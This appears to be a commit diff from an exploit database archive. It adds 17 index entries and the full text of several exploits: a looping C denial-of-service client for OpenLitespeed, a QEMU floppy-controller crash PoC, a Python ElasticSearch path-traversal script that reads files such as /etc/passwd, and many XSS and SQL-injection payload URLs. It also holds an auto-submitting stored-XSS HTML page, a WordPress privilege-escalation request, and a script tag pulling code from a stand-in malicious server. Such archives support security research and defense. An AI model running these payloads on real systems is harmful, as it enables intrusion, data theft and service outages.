DB: 2015-05-22

17 new exploits

files.csv

@@ -6985,7 +6985,7 @@ id,file,description,date,author,platform,type,port
 7441,platforms/php/webapps/7441.txt,"joomla live chat (sql/proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0
 7442,platforms/windows/remote/7442.txt,"TmaxSoft JEUS Alternate Data Streams File Disclosure Vulnerability",2008-12-12,"Simon Ryeo",windows,remote,0
 7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability",2008-12-14,Osirys,php,webapps,0
-7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script 1.0.6 - (DD/RFI) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0
+7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - (DD/RFI) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0
 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0
 7446,platforms/asp/webapps/7446.txt,"ASPired2Quote (quote.mdb) Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0
 7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System (Auth Bypass) SQL Injection Vuln",2008-12-14,Pouya_Server,asp,webapps,0
@@ -33392,6 +33392,7 @@ id,file,description,date,author,platform,type,port
 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0
 37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0
 37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - SQL Injection",2015-05-13,"Wad Deek",php,webapps,0
+37005,platforms/hardware/webapps/37005.txt,"IPLINK IP-DL-801RT-B - (Url Filter Configuration Panel) Stored XSS",2015-05-13,"XoDiAK BlackHat",hardware,webapps,0
 37007,platforms/linux/remote/37007.txt,"AtMail 1.04 Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0
 37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross Site Scripting Vulnerability",2012-03-24,3spi0n,php,webapps,0
 37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability",2012-03-23,voidloafer,java,webapps,0
@@ -33434,6 +33435,11 @@ id,file,description,date,author,platform,type,port
 37046,platforms/php/webapps/37046.txt,"osCMax 2.5 admin/new_attributes_include.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
 37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
 37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
+37049,platforms/windows/local/37049.txt,"Microsoft Windows - Local Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0
+37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use After Free (DoS)",2015-05-18,"Denis Andzakovic",linux,dos,0
+37052,platforms/windows/local/37052.c,"Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0
+37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) PoC",2015-05-18,"Marcus Meissner",multiple,dos,0
+37054,platforms/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2  - Path Transversal",2015-05-18,pandujar,php,webapps,0
 37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80
 37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0
 37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion Vulnerability",2015-05-18,Vulnerability-Lab,ios,webapps,80
@@ -33447,3 +33453,14 @@ id,file,description,date,author,platform,type,port
 37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80
 37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0
 37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 execve ""/bin/sh"" - shellcode 26 bytes",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
+37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0
+37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0
+37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
+37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0
+37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0
+37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
+37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
+37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
+37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php Multiple Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
+37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 Multiple SQL Injection Vulnerabilities",2015-05-21,"Filippo Roncari",php,webapps,80
+37080,platforms/php/webapps/37080.txt,"WordPress WP Symposium Plugin 15.1 SQL Injection Vulnerability",2015-05-21,"Hannes Trunde",php,webapps,80

platforms/hardware/webapps/37005.txt

@@ -0,0 +1,44 @@
+# Exploit Title: IPLINK IP-DL-801RT-B (Url Filter Configuration Panel)
+Stored XSS
+# Google Dork: N/A
+# Date: 13/05/2015
+# Exploit Author: Xodiak xodiak.blackhat@gmail.com
+# Vendor Homepage: http://iplink.com.tw
+# Software Link: N/A
+# Version: All Version
+# Tested on: Kali Linux
+# CVE : N/A
+#
+Interductions:
+A Stored XSS Vulnerability In Url Filter Configuration Panel Discovered.
+
+If Any JavaScript Code Add In Form Can Open Ports , Enable UPNP , Disable
+Firewall ,Hijack Bowser By Beef And,etc..
+
+This Can Harm System And Modem :)
+
+POC:
+http://192.168.1.1/url_nokeyword.htm
+
+GET /url_nokeyword.htm HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101
+Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.1/code.htm
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+
+HTTP/1.1 200 OK
+Server: Virtual Web 0.9
+Content-Length: 2690
+
+
+
+===================
+Greetz :
+=-| Milad Hacking, Seravo BlackHat, AC3S , Ehsan Ice , Saeed.J0ker,Alireza
+Attacker,MMA Defacer,END3R
+Amir Avinny,Abzari,Ali.Yar.RM_MR,SHA13AH And All Of My Friends |-=

platforms/linux/dos/37051.c

@@ -0,0 +1,161 @@
+/*
+*	Openlitespeed 1.3.9 Use After Free denial of service exploit.
+*
+*	This exploit triggers a denial of service condition within the Openlitespeed web 
+*	server. This is achieved by sending a tampered request contain a large number (91)
+*	of 'a: a' header rows. By looping this request, a memmove call within the HttpReq
+*	class is triggered with a freed pointer, resulting in a reference to an invalid
+*	memory location and thus a segmentation fault.
+*
+*	UAF Request:
+*	GET / HTTP/1.0
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	a: a
+*	
+*	The above request should be placed into a file name 'uafcrash' prior to running this
+*	exploit code.
+*
+*	Date: 24/03/2015
+*	Author: Denis Andzakovic - Security-Assessment.com
+*
+*/
+
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <errno.h>
+
+extern int errno;
+
+int main(int argc, char ** argv){
+	FILE * fp;
+	size_t len = 0;
+	char * line;
+	if((fp = fopen("uafcrash", "r")) == NULL){
+		fprintf(stderr, "[!] Error: Could not open file uafcrash: %s", strerror(errno));
+		return 1;
+	}
+
+	char * host = "127.0.0.1";
+	int port = 8088;
+	int count = 0; 
+	int sock;
+	struct sockaddr_in serv_addr;
+	while(1){
+		if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){
+			fprintf(stderr, "[!] Error: Could not create socket \n");
+			return 1;
+		} 
+
+		serv_addr.sin_family = AF_INET;
+		serv_addr.sin_port = htons(port);
+		inet_pton(AF_INET, host, &serv_addr.sin_addr);
+
+		if(connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr))<0){
+			fprintf(stderr, "[!] Error: Could not connect! Check for server crash! Total cases sent:%d\n", count);
+			close(sock);
+			return 1;
+		}
+		while ((getline(&line, &len, fp)) != -1){
+
+			write(sock, line, strlen(line));
+		}
+
+		close(sock);
+		rewind(fp);
+		count++;
+	}
+
+	return 42;
+}

platforms/multiple/dos/37053.c

@@ -0,0 +1,14 @@
+// Source: https://marc.info/?l=oss-security&m=143155206320935&w=2
+
+#include <sys/io.h>
+
+#define FIFO 0x3f5
+
+int main() {
+        int i;
+        iopl(3);
+
+        outb(0x0a,0x3f5); /* READ ID */
+        for (i=0;i<10000000;i++)
+                outb(0x42,0x3f5); /* push */
+}

platforms/php/webapps/37054.py

@@ -0,0 +1,56 @@
+#!/usr/bin/python
+# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
+# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
+# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
+# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
+#
+# Source: https://github.com/pandujar/elasticpwn/
+
+import socket, sys
+
+print "!dSR ElasticPwn - for CVE-2015-3337\n"
+if len(sys.argv) <> 3:
+        print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
+        sys.exit()
+
+port = 9200 # Default ES http port
+host = sys.argv[1]
+fpath = sys.argv[2]
+
+def grab(plugin):
+		socket.setdefaulttimeout(3)
+		s = socket.socket()
+		s.connect((host,port))
+		s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
+			"Host: %s\n\n" % (plugin, fpath, host))
+		file = s.recv(2048)
+		print "	[*] Trying to retrieve %s:" % fpath
+		if ("HTTP/1.0 200 OK" in file):
+			print "\n%s" % file
+		else:
+		    print "[-] File Not Found, No Access Rights or System Not Vulnerable"
+
+def pfind(plugin):
+	try:
+		socket.setdefaulttimeout(3)
+		s = socket.socket()
+		s.connect((host,port))
+		s.send("GET /_plugin/%s/ HTTP/1.0\n"
+			"Host: %s\n\n" % (plugin, host))
+		file = s.recv(16)
+		print "[*] Trying to find plugin %s:" % plugin
+		if ("HTTP/1.0 200 OK" in file):
+			print "[+] Plugin found!"
+			grab(plugin)
+			sys.exit()
+		else:
+		    print "[-]  Not Found "
+	except Exception, e:
+		print "[-] Error connecting to %s: %s" % (host, e)
+		sys.exit()
+
+# Include more plugin names to check if they are installed
+pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
+
+for plugin in pluginList:
+	pfind(plugin)

platforms/php/webapps/37070.txt

@@ -0,0 +1,46 @@
+source: http://www.securityfocus.com/bid/52944/info
+
+Uploadify Integration plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Uploadify Integration 0.9.6 is vulnerable; other prior versions may also be affected. 
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
+
+http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
+file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>

platforms/php/webapps/37071.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52946/info
+
+CitrusDB is prone to a local file-include vulnerability and an SQL-injection vulnerability.
+
+An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver.
+
+CitrusDB 2.4.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base 

platforms/php/webapps/37072.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/52970/info
+
+Matterdaddy Market is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Matterdaddy Market 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/mdmarket/admin/controller.php?cat_name=1&cat_order=-1%27[SQL INJECTION]&add=Add+Category&op=newCategory
+
+http://www.example.com/mdmarket/admin/controller.php?cat_name=-1%27[SQL INJECTION]&cat_order=1&add=Add+Category&op=newCategory 

platforms/php/webapps/37073.html

@@ -0,0 +1,130 @@
+source: http://www.securityfocus.com/bid/52983/info
+
+BGS CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+BGS CMS 2.2.1 is vulnerable; other versions may also be affected. 
+
+<html>
+<title>BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities</title>
+<body bgcolor="#000000">
+<script type="text/javascript">
+function xss0(){document.forms["xss0"].submit();}
+function xss1(){document.forms["xss1"].submit();}
+function xss2(){document.forms["xss2"].submit();}
+function xss3(){document.forms["xss3"].submit();}
+function xss4(){document.forms["xss4"].submit();}
+function xss5(){document.forms["xss5"].submit();}
+function xss6(){document.forms["xss6"].submit();}
+function xss7(){document.forms["xss7"].submit();}
+</script>
+
+<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss0">
+<input type="hidden" name="name" value="Zero Science Lab" />
+<input type="hidden" name="title" value="XSS" />
+<input type="hidden" name="description" value="Cross Site Scripting" />
+<input type="hidden" name="parent_id" value="15" />
+<input type="hidden" name="redirect" value='"><script>alert(1);</script>' />
+<input type="hidden" name="close" value="OK" />
+<input type="hidden" name="section" value="categories" />
+<input type="hidden" name="action" value="edit" />
+<input type="hidden" name="id" value="29" />
+</form>
+
+<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
+<input type="hidden" name="title" value="Zero Science Lab" />
+<input type="hidden" name="description" value='"><script>alert(1);</script>' />
+<input type="hidden" name="disp_on_full_view" value="1" />
+<input type="hidden" name="status" value="1" />
+<input type="hidden" name="level" value="0" />
+<input type="hidden" name="type" value="ads" />
+<input type="hidden" name="close" value="OK" />
+<input type="hidden" name="section" value="ads" />
+<input type="hidden" name="action" value="edit" />
+<input type="hidden" name="id" value="0" />
+</form>
+
+<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
+<input type="hidden" name="created" value="ZSL" />
+<input type="hidden" name="name" value='"><script>alert(1);</script>' />
+<input type="hidden" name="email" value="test@test.mk" />
+<input type="hidden" name="message" value="t00t" />
+<input type="hidden" name="status" value="coolio" />
+<input type="hidden" name="close" value="OK" />
+<input type="hidden" name="section" value="orders" />
+<input type="hidden" name="action" value="edit" />
+</form>
+
+<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss3">
+<input type="hidden" name="name" value='"><script>alert(1);</script>' />
+<input type="hidden" name="question" value="What is physics?" />
+<input type="hidden" name="start" value="10 2012" />
+<input type="hidden" name="end" value="18 2012" />
+<input type="hidden" name="answer_text[]" value="A warm summer evening." />
+<input type="hidden" name="close" value="OK" />
+<input type="hidden" name="section" value="polls" />
+<input type="hidden" name="action" value="edit" />
+</form>
+
+<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss4">
+<input type="hidden" name="name" value="admin" />
+<input type="hidden" name="image" value="joxy.jpg" />
+<input type="hidden" name="url" value='"><script>alert(1);</script>' />
+<input type="hidden" name="max_displays" value="1" />
+<input type="hidden" name="close" value="OK" />
+<input type="hidden" name="section" value="banners" />
+<input type="hidden" name="action" value="edit" />
+<input type="hidden" name="id" value="9" />
+</form>
+
+<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss5">
+<input type="hidden" name="title" value='"><script>alert(1);</script>' />
+<input type="hidden" name="description" value="Ban" />
+<input type="hidden" name="folder" value="sexy_banner_imgx" />
+<input type="hidden" name="close" value="OK" />
+<input type="hidden" name="section" value="gallery" />
+<input type="hidden" name="action" value="edit" />
+</form>
+
+<form action="http://www.example.com/" method="GET" id="xss6">
+<input type="hidden" name="action" value="search" />
+<input type="hidden" name="search" value='"><script>alert(1);</script>' />
+<input type="hidden" name="x" value="0" />
+<input type="hidden" name="y" value="0" />
+</form>
+
+<form action="http://www.example.com/cms/" method="GET" id="xss7">
+<input type="hidden" name="section" value='"><script>alert(1);</script>' />
+<input type="hidden" name="action" value="add_news" />
+</form>
+
+<br /><br />
+
+<a href="javascript: xss0();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 0</h3></font></b></a><br />
+
+<a href="javascript: xss1();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 1</h3></font></b></a><br />
+
+<a href="javascript: xss2();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 2</h3></font></b></a><br />
+
+<a href="javascript: xss3();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 3</h3></font></b></a><br />
+
+<a href="javascript: xss4();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 4</h3></font></b></a><br />
+
+<a href="javascript: xss5();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 5</h3></font></b></a><br />
+
+<a href="javascript: xss6();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 6</h3></font></b></a><br /><br />
+
+<a href="javascript: xss7();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 7</h3></font></b></a><br /><br />
+
+</body></html>

platforms/php/webapps/37074.txt

@@ -0,0 +1,106 @@
+# Exploit Title: WordPress WP Membership plugin [Multiple Vulnerabilities]
+# Date: 2015/05/19
+# Exploit Author: Panagiotis Vagenas
+# Contact: https://twitter.com/panVagenas
+# Vendor Homepage: http://wpmembership.e-plugins.com/
+# Software Link: http://codecanyon.net/item/wp-membership/10066554
+# Version: 1.2.3
+# Tested on: WordPress 4.2.2
+# Category: webapps
+
+========================================
+* 1. Privilege escalation
+  ========================================
+
+1.1 Description
+
+Any registered user can perform a privilege escalation through 
+`iv_membership_update_user_settings` AJAX action.
+Although this exploit can be used to modify other plugin related data 
+(eg payment status and expiry date), privilege escalation can lead to a 
+serious incident because the malicious user can take administrative role 
+to the infected website.
+
+1.2 Proof of Concept
+
+* Login as regular user
+* Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` 
+with data: 
+`action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator` 
+
+
+1.3 Actions taken after discovery
+
+Vendor was informed on 2015/05/19.
+
+1.4 Solution
+
+No official solution yet exists.
+
+========================================
+* 2. Stored XSS
+========================================
+
+2.1 Description
+
+All input fields from registered users aren't properly escaped. This 
+could lead to an XSS attack that could possibly affect all visitors of 
+the website, including administators.
+
+2.2 Proof of Concept
+
+* Login as regular user
+* Update any field of your profile appending at the end
+     `<script>alert('XSS');</script>`
+     or
+     `<script src=”http://malicious .server/my_malicious_script.js”/>`
+
+2.3 Actions taken after discovery
+
+Vendor was informed on 2015/05/19.
+
+2.4 Solution
+
+No official solution yet exists.
+
+========================================
+* 3. Unauthorized post publish and stored XSS
+  ========================================
+
+3.1 Description
+
+Registered users can publish a post without administrator confirmation. 
+Normally all posts submitted  by users registered with WP Membership 
+plugin are stored with the status `pending`. A malicious user though can 
+publish his post by crafting the form is used for submission.
+
+3.2 Proof of Concept
+
+* Login as regular user
+  whom belongs to a group that can submit new posts
+* Visit the `New Post` section at your profile
+* Change field `post_status`:
+     <select id="post_status" class="form-control" name="post_status">
+         <option value="publish" selected=”selected”>Pending 
+Review</option>
+         <option value="draft">Draft</option>
+     </select>
+
+The post gets immediately published after you submit the form and is 
+visible to all visitors of the website.
+
+In addition a stored XSS attack can be performed due to insufficient 
+escaping of the post content input.
+
+3.3 Actions taken after discovery
+
+Vendor was informed on 2015/05/19.
+
+3.4 Solution
+
+No official solution yet exists.
+
+3.5 Workaround
+
+Prevent users from submitting new posts through the relative option in 
+plugin's settings

platforms/php/webapps/37075.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52986/info
+
+All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected. 
+
+http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22 %3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

platforms/php/webapps/37076.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52986/info
+ 
+All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+ 
+All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected. 
+
+http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php?button_value= %22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

platforms/php/webapps/37077.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52986/info
+  
+All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+  
+All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected. 
+
+http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php?msg=%3Cscript%3E alert%28document.cookie%29;%3C/script%3E

platforms/php/webapps/37078.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/52986/info
+   
+All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+   
+All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected. 
+
+http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22 %3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget ]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3E alert%28document.cookie%29;%3C/script%3E
+
+http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before _title=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_ title=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

platforms/php/webapps/37079.txt

@@ -0,0 +1,71 @@
+Forma LMS 1.3 Multiple SQL Injections
+
+[+] Author: Filippo Roncari
+[+] Target: Forma LMS 
+[+] Version: 1.3 and probably lower
+[+] Vendor: http://www.formalms.org
+[+] Accessibility: Remote
+[+] Severity: High
+[+] CVE: <requested>
+[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf
+[+] Info: f.roncari@securenetwork.it / f@unsec.it
+
+
+[+] Summary
+Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more.
+
+
+[+] Vulnerability Details
+Forma LMS 1.3 is prone to multiple SQL injections vulnerabilities, which allow unprivileged users to inject arbitrary SQL statements.
+An attacker could exploit these vulnerabilities by sending crafted requests to the web application. These issues can lead to data theft, data disruption, account violation and other attacks depending on the DBMS’s user privileges.
+
+
+[+] Technical Details
+See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for technical details and source code.
+
+
+[+] Proof of Concept (PoC)
+Unprivileged users such as Student or Professors could exploit these issues.
+In reported payload "idst" SQL param is equal to 11836 which was admin's ID in tested installation.
+
+	[!] coursereport.php SQL Injection in title param
+	-------------------------
